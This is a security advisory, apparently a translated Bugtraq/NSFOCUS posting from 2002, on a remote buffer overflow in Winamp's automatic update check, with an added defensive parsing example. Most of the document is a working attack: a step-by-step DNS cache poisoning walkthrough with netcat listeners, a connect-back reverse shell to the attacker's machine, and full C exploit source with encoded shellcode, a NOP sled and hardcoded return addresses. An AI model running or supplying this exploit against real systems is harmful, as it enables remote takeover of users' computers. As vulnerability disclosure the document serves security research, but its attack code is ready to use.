Nullsoft Winamp Automatic Update Check Remote Buffer Overflow Vulnerability

Published: 2002-07-05
Updated: 2002-07-15

Affected systems:

Nullsoft Winamp 2.79
Nullsoft Winamp 2.74
Nullsoft Winamp 2.73 (full)
Nullsoft Winamp 2.72
Nullsoft Winamp 2.71
Nullsoft Winamp 2.70 (full)
Nullsoft Winamp 2.65
Nullsoft Winamp 2.64 (standard)
Nullsoft Winamp 2.62 (standard)
Nullsoft Winamp 2.61 (full)
Nullsoft Winamp 2.60 (lite)
Nullsoft Winamp 2.60 (full)
Nullsoft Winamp 2.50
Nullsoft Winamp 2.80
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000

Description:

BUGTRAQ ID: 5170

Nullsoft Winamp is a media player for the Windows operating system that supports MP3 and many other file types.

When Nullsoft Winamp automatically checks for a newer software version, it does not properly validate the response it receives. A remote attacker can exploit this to cause a buffer overflow.

Nullsoft Winamp has an option, enabled by default, that checks the www.winamp.com site at startup for a new version and then tells the user via a message box whether an upgrade is available. Winamp does not properly handle the returned reply: a remote attacker who can forge the reply from www.winamp.com and send an oversized response can throw the thread parsing the data into an infinite loop until the exception handler is invoked. A carefully constructed reply may allow arbitrary instructions to be executed on the system with the privileges of the winamp process.

By means of DNS cache poisoning, an attacker can control the resolution of www.winamp.com and use that to exploit this vulnerability.
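As an added illustration (not code from this advisory, from Winamp, or from the exploit's author), the following C function shows the check the description says is missing: an update-check reply is accepted only if it stays within a fixed size and matches the expected "OK" / version layout, so an oversized or malformed reply is rejected before any copying. The reply layout is assumed from the header bytes of the exploit's payload, and the size limits are constructed values.

```c
/*
 * Added example, not part of the advisory or of Winamp: a length-bounded
 * parser for the update-check reply. The layout "OK\r\n\r\n<version>\r\n\r\n"
 * is assumed from the exploit payload's header; the limits are constructed.
 */
#include <string.h>
#include <ctype.h>

#define MAX_RESPONSE_LEN 64   /* far below any overflow-sized reply */
#define MAX_VERSION_LEN  15   /* e.g. "2.80" */

typedef enum { PARSE_OK = 0, PARSE_TOO_LONG, PARSE_BAD_HEADER,
               PARSE_BAD_VERSION } parse_result;

/* Parse a reply of `len` bytes into `version` (a buffer of at least
 * MAX_VERSION_LEN + 1 bytes). Every access is bounded by `len` and the
 * version limit, so a hostile reply cannot run the parser past the end
 * of a buffer or into an unbounded loop. */
parse_result parse_update_response(const unsigned char *buf, size_t len,
                                   char *version)
{
    static const char header[] = "OK\r\n\r\n";
    const size_t hlen = sizeof(header) - 1;
    size_t i, vlen = 0;

    version[0] = '\0';
    if (len > MAX_RESPONSE_LEN)          /* reject before touching content */
        return PARSE_TOO_LONG;
    if (len < hlen || memcmp(buf, header, hlen) != 0)
        return PARSE_BAD_HEADER;

    /* version: digits and dots only, bounded length, terminated by CRLF */
    for (i = hlen; i < len && buf[i] != '\r'; i++) {
        if (vlen >= MAX_VERSION_LEN) return PARSE_BAD_VERSION;
        if (!isdigit(buf[i]) && buf[i] != '.') return PARSE_BAD_VERSION;
        version[vlen++] = (char)buf[i];
    }
    version[vlen] = '\0';
    /* non-empty, starts and ends with a digit, and the CRLF is present */
    if (vlen == 0 || !isdigit((unsigned char)version[0]) ||
        !isdigit((unsigned char)version[vlen - 1]) ||
        i + 1 >= len || buf[i + 1] != '\n') {
        version[0] = '\0';
        return PARSE_BAD_VERSION;
    }
    return PARSE_OK;
}
```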

<*Source: 2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)
  
  Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0054.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users assume all risk!


2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com) provided the following test method:

Name server      - 192.168.0.1
Attacker machine - 192.168.1.2
Target machine   - 192.168.0.2

1) The attacker tampers with the name server's cache:

192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2) The target machine now resolves www.winamp.com to the attacker's machine:

192.168.0.2:
C:\>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1

Name: www.winamp.com
Address: 192.168.1.2

3) The attacker runs the exploit code below:

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4) The attacker waits for the connect-back:

192.168.1.2:

x@x:~$ nc -l -p 5555

5) The attack succeeds:

192.168.0.2:

opens winamp, prepares for The Weather Girls - It's Raining Men.mp3



6) BOOJAH!@

192.168.1.2:

x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com) provided the following test program:

/*
        wampexp.c
        July 3rd, 2002
         
        Winamp 2.80a and all previous remote exploit (connect-back styles)


        winamp has an option, enabled by default, which checks for the latest
        version from www.winamp.com and will then notify the user of a possible
        upgrade via a messagebox..
         
        unfortunately, if it were to receive a huge response via some nameserver
        corruption the thread parsing the response is thrown into an infinite
        loop and eventually the exception dispatcher is called.. and THEN like
        most of the time under windows a big, bad, overflow occurs..
         
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
             
            C:\>
         
        sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
        (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)
         
        yes, yahoo took away my 2! ;~~~
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>


// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";


// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..


unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";


int main(int argc, char **argv){
        int i;
        unsigned short int a_port;
        unsigned long a_host;
        struct hostent *ht;
        struct sockaddr_in sin;
         
        if (argc < 3){
                printf("Winamp 2.80a remote exploit (7/3/2002)\n");
                printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
                printf("usage: %s <localhost> <localport>\n\n", argv[0]);
                printf("NOTE: target os is 2000.. probably works on all\n");
                printf("winamp versions prior to 2.80a as there are no \n");
                printf("dependancies on winamp, only the static ws2help\n\n");
                exit(-1);
        }


        // blatantly ripped! *TEEHEEEHHEH*
        a_port = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
         
        strcat(payload, shell);
         
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");


        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
        strcat(payload, "\x11\x01\xff\xe3");


        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
  
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
         
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
        strcat(payload, "\xd6\x19\x02\x75");


        // if ws2help doesn't match for some reason, use this call ebx..
        // dependant on the winamp in_wm.dll plugin
        //strcat(payload, "\x57\x22\x12\x01");
  
        strcat(payload, "\x0d\x0a");


        printf("%s", payload);
        return 0;
}

Recommendations:

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* No suitable temporary workaround is available at this time.

Vendor patch:

Nullsoft
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.winamp.com/


This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.